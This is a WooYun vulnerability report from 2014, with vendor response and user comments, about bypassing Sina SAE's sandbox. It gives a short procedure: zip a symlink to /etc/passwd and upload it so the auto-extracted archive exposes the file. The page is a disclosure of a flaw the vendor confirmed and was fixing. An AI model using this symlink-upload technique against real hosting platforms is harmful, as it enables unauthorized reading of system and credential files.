当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-086433

漏洞标题:绕过新浪SAE沙盒读取系统任意文件

相关厂商:新浪

漏洞作者: boooooom

提交时间:2014-12-08 19:58

修复时间:2015-01-22 20:04

公开时间:2015-01-22 20:04

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-12-08: 细节已通知厂商并且等待厂商处理中
2014-12-09: 厂商已经确认,细节仅向厂商公开
2014-12-19: 细节向核心白帽子及相关领域专家公开
2014-12-29: 细节向普通白帽子公开
2015-01-08: 细节向实习白帽子公开
2015-01-22: 细节向公众公开

简要描述:

RT

详细说明:

http://zone.wooyun.org/content/17131
学以致用
sae可以上传zip代码包部署

1.创建一个链接文件到/etc/passwd
ln -s /etc/passwd link
2. 压缩文件,同时保留链接
zip --symlinks test.zip link
3.上传test.zip文件,系统会自动解压缩
4. 代码文件当中会返回/etc/passwd的内容。

漏洞证明:

passwd.jpg

修复方案:

检查上传的文件是否包含连接

版权声明:转载请注明来源 boooooom@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2014-12-09 16:05

厂商回复:

感谢关注新浪安全,漏洞正在修复中。

最新状态:

暂无

漏洞评价:

评论

  1. 2014-12-08 20:07 | RainShine ( 路人 | Rank:2 漏洞数:4 )

    卧槽,电了……

  2. 2014-12-08 20:12 | 子非海绵宝宝 认证白帽子 ( 核心白帽子 | Rank:1044 漏洞数:106 | 发扬海绵宝宝的精神!你不是海绵宝宝,你怎...)

    有电!~

  3. 2014-12-08 20:14 | 天地不仁 以万物为刍狗 ( 普通白帽子 | Rank:977 漏洞数:264 | 天地本不仁 万物为刍狗)

    前排

  4. 2014-12-08 20:21 | 玉林嘎 ( 普通白帽子 | Rank:758 漏洞数:96 )

    booooooom

  5. 2014-12-08 20:50 | ling ( 实习白帽子 | Rank:76 漏洞数:35 | 我是屌丝、我为自己代言 。)

    6666

  6. 2014-12-08 20:52 | Anonymous ( 普通白帽子 | Rank:146 漏洞数:30 | 园长是大傻逼)

    混脸熟交朋友。明白的加QQ 5737796

  7. 2014-12-08 21:01 | 浅蓝 ( 普通白帽子 | Rank:274 漏洞数:109 | 爱安全:www.ixsec.orgXsec社区:zone.ixse...)

    卧槽啊

  8. 2014-12-08 21:02 | 机器猫 ( 普通白帽子 | Rank:1141 漏洞数:253 | 爱生活、爱腾讯、爱网络!)

    CCAV看这里!

  9. 2014-12-08 21:49 | 秋风 ( 普通白帽子 | Rank:438 漏洞数:44 | 码农一枚,关注互联网安全)

    NB!

  10. 2014-12-09 09:22 | CplusHua ( 普通白帽子 | Rank:238 漏洞数:33 | 乌云奖金:-1)

    不是把。

  11. 2014-12-09 09:24 | ppt ( 路人 | Rank:11 漏洞数:2 | ) | ( 我猜出了用户名,可我没猜出密码。)

    gae bypass?

  12. 2014-12-09 09:47 | _Thorns ( 普通白帽子 | Rank:882 漏洞数:157 | 收wb 1:5 无限量收 [平台担保]))

    混脸熟,牛逼。

  13. 2014-12-09 14:31 | 黑暗游侠 ( 普通白帽子 | Rank:1780 漏洞数:268 | 123)

    @玉林嘎 @ling @Anonymous @机器猫 @浅蓝 @秋风 @CplusHua @ppt @_Thorns @天地不仁 以万物为刍狗 @子非海绵宝宝 @RainShine 不会是这个直接拿来用的吧,汗,时间上也很吻合。

  14. 2014-12-09 14:31 | 黑暗游侠 ( 普通白帽子 | Rank:1780 漏洞数:268 | 123)

    http://zone.wooyun.org/content/17168

  15. 2014-12-09 14:39 | boooooom 认证白帽子 ( 普通白帽子 | Rank:467 漏洞数:50 | 我有一个好想法!)

    @黑暗游侠 去试试看~ 这种老掉渣的东西,有问题早被人发现了。

  16. 2014-12-09 14:46 | 黑暗游侠 ( 普通白帽子 | Rank:1780 漏洞数:268 | 123)

    @boooooom 我没电脑,坐等公开

  17. 2014-12-09 16:16 | 我的老伙伴们都惊呆了 ( 路人 | Rank:8 漏洞数:4 | 我爱西红柿)

    @boooooom facebook类似的那种?

  18. 2014-12-29 16:59 | 黑暗游侠 ( 普通白帽子 | Rank:1780 漏洞数:268 | 123)

    @boooooom 公开了,洞主被打脸了,看你之前的评论

  19. 2014-12-30 09:25 | BMa ( 普通白帽子 | Rank:1776 漏洞数:200 )

    真心不错

  20. 2015-01-22 20:18 | Jumbo ( 普通白帽子 | Rank:111 漏洞数:29 | 猫 - http://www.chinabaiker.com)

    步骤是1-2-3,然后系统会执行2-1?

  21. 2015-01-22 21:09 | z@cx ( 普通白帽子 | Rank:434 漏洞数:56 | 。-。-。)

    思路的确很棒,赞一个!!!

  22. 2015-01-23 10:44 | 多情公子 ( 路人 | Rank:0 漏洞数:2 | google)

    这种漏洞是怎么找的,大牛,求指点....